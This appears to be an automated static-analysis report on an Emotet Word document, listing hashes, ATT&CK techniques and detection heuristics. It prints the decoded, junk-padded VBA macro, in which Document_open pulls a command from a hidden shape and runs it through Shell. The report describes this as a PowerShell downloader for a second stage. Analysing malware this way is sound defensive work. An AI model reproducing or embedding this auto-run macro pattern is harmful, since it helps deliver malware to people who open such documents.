Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 84a8b82276393a5a…

MALICIOUS

Office (OLE)

137.1 KB Created: 2018-11-30 07:14:00 Authoring application: Microsoft Office Word First seen: 2019-01-11
MD5: 0c1e6808f6f89acf75895b752c67b878 SHA-1: d3a83165bac653f9ded554315e227f8b82fd1fe7 SHA-256: 84a8b82276393a5afffd2bfd144aac06882f6c45ac8fdc9a45c0f85d2a1a6e1c
272 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a Document_Open VBA macro that utilizes Shell() to execute a command. This command invokes cmd.exe with obfuscated arguments, which in turn calls PowerShell to download and execute a second-stage payload from a constructed URL. The ClamAV detection name 'Doc.Downloader.Emotet-6826427-0' strongly suggests the Emotet family.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-6826427-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6826427-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
                aoQoJnDwH = CByte(228743821)
JvVRsF = Array(nzKcl, Interaction.Shell(IOBAT, iISLm), qurzup)
   On Error Resume Next
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
Private Sub Document_open()
   On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5072 bytes
SHA-256: 4493551c0199bef80f19a23599e55dba834c39ea62409585cdca58dcadaca0c9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
104 of 170 identifiers look randomly generated (e.g. 'VClVVbTKp') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XJPQrRGL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   On Error Resume Next
            MQpKtLmI = Atn(wPIVk)
            iCpsLmmu = CLng(PaNUj)
            RGzdouN = Cos(wzlhwkG)
            tJnbSZX = CByte(CZViuTz)
            cjhILr = CByte(315494543)
            RdruaFoK = CBool(369406)
            hEhEIriY = OYiiizT
            RDzOB = 86969469
            JpidwzlLi = CByte(31591255)
   On Error Resume Next
            dGBBcFfU = Atn(mEBqZU)
            XRitdzvL = CLng(YcoXhjPJP)
            lEiFnjDMz = Cos(ifQBtUj)
            KCdLqDEc = CByte(wjFprbdik)
            MrJZnzkP = CByte(294997500)
            niMAfw = CBool(88312222)
            aOiBKs = frlqE
            SJjTsAcq = 88776753
            oLRDS = CByte(135083450)
Set sNLHV = Shapes("maIYbjEoE")
   On Error Resume Next
            ZhBMmw = Atn(sNOVcw)
            APThUkXL = CLng(vsbKaGKa)
            ilDAwa = Cos(VClVVbTKp)
            zcJqMnNzG = CByte(LmklDn)
            tKdAR = CByte(298939872)
            whmpOUZQ = CBool(137021799)
            IhQWWwqC = GkjSzShSZ
            MsjjY = 285057194
            AXimuuRC = CByte(193512846)
   On Error Resume Next
            uckuNSV = Atn(ciwTWazw)
            hJYcO = CLng(rFBbSAG)
            WNFDOrQaD = Cos(WGfnolpZ)
            ZPiAujBso = CByte(rCnWnZ)
            QXjFs = CByte(47941349)
            lFHvE = CBool(108827945)
            lsEhbs = LXMwbO
            kjksNj = 134718117
            qqjIYP = CByte(267378594)
   On Error Resume Next
            fOSBDw = Atn(AmHVotNti)
            QwNam = CLng(WbWKojA)
            ikCnkEzC = Cos(LSUSdH)
            SwhRCmCp = CByte(mvahmCTlY)
            DqZJdCOjB = CByte(55518223)
            JsTjrq = CBool(336556548)
            jriNuzJX = aIwjtmD
            tpDOoDAjb = 195003363
            GwvMU = CByte(12579616)
IOBAT = sNLHV.TextFrame.ContainingRange
   On Error Resume Next
            LBWiG = Atn(PTdTbKzw)
            ZVUwci = CLng(UCVDajSSU)
            LIEUaj = Cos(XYGRoUN)
            RzajQzC = CByte(QhUJDFj)
            LwLzo = CByte(302010647)
            zpuZEbifh = CBool(52932070)
            IlsmEQI = onGXWSrF
            qJNpY = 5881932
            qWawwmB = CByte(255403002)
   On Error Resume Next
            vLJsd = Atn(EjYDXZ)
            flPastKXA = CLng(tiVjXZ)
            oZEPw = Cos(nECkJq)
            OUIiTh = CByte(CVSDivs)
            JIcjGR = CByte(98682207)
            UfibbVpIA = CBool(218128220)
            DYarQqCET = BhBRX
            uIdjszWnz = 242537190
            ujfKD = CByte(10814977)
Const iISLm = 0
   On Error Resume Next
            dktiRLKA = Atn(nitWE)
            SRfYvmGbo = CLng(dzqHP)
            RDAZzQwY = Cos(IjGIV)
            RjutA = CByte(tiwWIFfo)
            UspFMq = CByte(146343652)
            wCTHRmG = CBool(1797411)
            TBMPwO = vYYDDr
            SkunoQ = 15708739
            JvEvr = CByte(220105209)
   On Error Resume Next
            pAjJEtY = Atn(XamKmYHt)
            skFtEQMNa = CLng(ItZsAohK)
            BGsnpvf = Cos(CzKqCwwbG)
            jljTvdJ = CByte(szilWF)
            ksoAzP = CByte(327571162)
            RKQPsGz = CBool(188958687)
            tQzZnh = OdZDhR
            bFdSEI = 178736987
            HmLSJ = CByte(203345184)
   On Error Resume Next
            EIkpvZjF = Atn(pIuWSkjYP)
            DkRRAW = CLng(qbnQSC)
            SbnsqPDP = Cos(jpvkzjTP)
            pTFvmq = CByte(TcjESfXF)
            Drzoh = CByte(340189237)
            nDicEl = CBool(146977532)
            IXzcj = WowHWnUL
            DRqctr = 143845262
            lqFRsEO = CByte(209106685)
   On Error Resume Next
            RYdMJ = Atn(VJsMCSREW)
            BOTIouI = CLng(aRCmHR)
            aKfKPEf = Cos(WANan)
            WDpCzK = CByte(lROXQNm)
            wiBanbHmu = CByte(45098320)
            VJwIaTU = CBool(36872171)
            NMjIH = otQnzrtLa
            MAAiOQ = 309373903
            aoQoJnDwH = CByte(228743821)
JvVRsF = Array(nzKcl, Interaction.Shell(IOBAT, iISLm), qurzup)
   On Error Resume Next
            mwmGamf = Atn(WTMZSzoAt)
            TtCJquKuF = CLng(ZPYAPs)
            jDjqF = Cos(TsVscCDM)
            OEdjZdF = CByte(wjjUZGvLK)
            rFwJBNF = CByte(225624211)
            VChrCz = CBool(329159305)
            TWjTd = MmKYUul
            hSdLGiE = 23995497
            arNkoP = CByte(270606979)
   On Error Resume Next
            iqTAa = Atn(cHKLhRiw)
            NzVumVwv = CLng(XruOaND)
            TYhCDXuH = Cos(KUnLarw)
            firfDijur = CByte(jtOhwHA)
            GRjKcbnQK = CByte(197059772)
            QwAvU = CBool(308011257)
            LAPqzILu = NHdYjK
            kjNVFQs = 252669301
            Gnajizt = CByte(253907358)
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.